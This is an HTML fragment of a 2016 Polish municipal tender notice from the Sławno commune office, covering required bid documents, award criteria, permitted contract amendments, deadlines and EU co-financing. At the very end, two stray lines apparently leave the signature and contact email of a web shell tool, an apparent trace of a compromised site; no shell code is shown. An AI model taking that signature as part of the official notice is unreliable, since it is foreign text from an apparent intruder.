<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany  formularz ofertowy sporządzony zgodnie z treścią i formą zawartą 
we wzorze (wg załączonego wzoru Nr 1 ) 
2. Harmonogram - zestawienie rzeczowo - finansowe (wg załączonego wzoru Nr 2,)
       do  celów poglądowych
3.  Dokument pełnomocnictwa - ( oryginał lub notarialnie poświadczona kopia ) do podpisania 
       oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności 
       dokumentem rejestracyjnym, również w przypadku złożenia  oferty przez wykonawców 
       ubiegających się o zamówienie wspólnie ( np. konsorcjum, sp. cywilna ), pełnomocnictwo 
      powinno   jednoznacznie   określać zakres umocowania  i wskazywać osobę pełnomocnika.
4.  Dowód wpłaty wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja jednolita na wykonane roboty oraz zastosowane materiały - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zgodnie z art. 142 ust. 5 ustawy pzp - postanowienia o zasadach zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
a) wysokości podatku od towarów i usług  jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych,
b) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę w odniesieniu do osób zatrudnionych przy realizacji niniejszego zamówienia;
c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, w odniesieniu do osób zatrudnionych przy realizacji niniejszego zamówienia,
      po 12 miesiącach realizacji przedmiotu umowy i  jeżeli zmiany te będą miały wpływ na koszty 
      wykonania zamówienia przez Wykonawcę; 
  2) zmiany lub rezygnacji z podwykonawcy dotyczącej podmiotu, na którego zasoby Wykonawca 
powoływał się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków 
udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać,
iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie  mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego, 
3) zmiany podwykonawców lub zakresu robót wykonywanych przez podwykonawców zgłoszonych    przez Wykonawców według postanowień umowy,
4)zmianę terminu realizacji umowy z powodu wystąpienia nadzwyczajnych warunków
atmosferycznych w szczególności klęsk żywiołowych, uniemożliwiających prowadzenie robót
budowlanych, 
   5) jeżeli konieczność zmiany terminu realizacji umowy wynikła z okoliczności niezawinionych przez 
       Wykonawcę, a w szczególności została wymuszona oczekiwaniem na uzgodnienia lub wydanie 
       decyzji przez jakikolwiek właściwy organ (działanie lub bezczynność organów),
   6)konieczności zrealizowania przedmiotu zamówienia przy zastosowaniu innych rozwiązań 
       technicznych/ technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji 
       technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych   
      rozwiązań  groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy, 
7) wykonania robót zamiennych z przyczyn o charakterze technologicznym w stosunku 
       do przewidzianych w dokumentacji projektowej, gdy wykonanie tych robót będzie niezbędne
       do prawidłowego wykonania umowy i nie spowoduje rozszerzenia przedmiotu zamówienia 
       w stosunku do przedmiotu określonego w specyfikacji istotnych warunków zamówienia oraz
       wynikającego z treści oferty,
 8) nadzwyczajnych warunków nieprzewidzianych w SIWZ jak: niewypały i niewybuchy; wykopaliska
   archeologiczne; inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy 
   skutkujących niemożliwością prowadzenia prac lub wykonywania innych czynności
    przewidzianych  umową,
 9) zaistnienia po stronie Zamawiającego konieczności usunięcia istotnych błędów lub wprowadzenia 
      istotnych zmian w dokumentacji projektowej lub w specyfikacjach technicznych wykonania 
      i odbioru robót budowlanych - nieujawnionych przed wszczęciem postępowania o udzielenie 
      zamówienia publicznego, 
10) zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające   warunki określone w specyfikacji istotnych warunków zamówienia, 
11) gdy wystąpią zmiany, których konieczność wprowadzenia będzie wynikała z wymagań instytucji 
współfinansujących realizację przedmiotu zamówienia,
12)  zmiany i modyfikacje w harmonogramie rzeczowo-finansowym na wniosek Zamawiającego, lub
        w okolicznościach, za które Wykonawca nie ponosi żadnej odpowiedzialności - na jego wniosek, 13) w przypadku wystąpienia okoliczności wstrzymania prowadzonej inwestycji przez czynniki 
        zewnętrzne (np. inne niezależne budowy),
14) wystąpienie konieczności wykonania robót dodatkowych, od których zależy wykonanie 
 przedmiotu   zamówienia;
15) odkrycie przeszkód, instalacji i urządzeń na terenie budowy, których  nie naniesiono  na 
 dokumentację geodezyjną, geologiczną lub projektową i których wystąpienie powoduje 
konieczność zmiany sposobu wykonania robót;
16) powzięcie informacji o nowych rozwiązaniach  technicznych, technologicznych i jakościowych, 
których zastosowanie okaże się korzystne dla zamawiającego, a nie spowoduje rozszerzenia zakresu zamówienia i konieczności zwiększenia umówionego 
wynagrodzenia;
 17) zaistnienia, po zawarciu Umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego 
     warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej,
	o charakterze niezależnym od Stron,
którego Strony nie mogły przewidzieć przed zawarciem Umowy,
	którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności,
za siłę wyższą, warunkująca zmianę Umowy uważać  się będzie w szczególności:
powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, które uniemożliwiają wykonanie umowy na warunkach w niej określonych.
4. Określa się następujący tryb dokonywania zmian postanowień umowy:
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron wyrażoną
     na piśmie, pod rygorem nieważności,
b) strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania 
   zaistnienia powyższych okoliczności,
c)  wniosek o zmianę postanowień zawartej umowy musi być wyrażony na  piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.ugslawno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
26 - 332 Sławno
pokój Nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2016 godzina 10:00, miejsce: Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
26 - 332 Sławno
pokój Nr 13 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinasowany w ramach  Regionalnego Programu Operacyjnego Województwa Łódzkiego  na lata 2014 - 2020  
Oś priorytetowa  II . Innowacyjna i konkurencyjna gospodarka 
Działanie II.1. Otoczenie biznesu
Poddziałanie II.1.1 Tereny inwestycyjne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com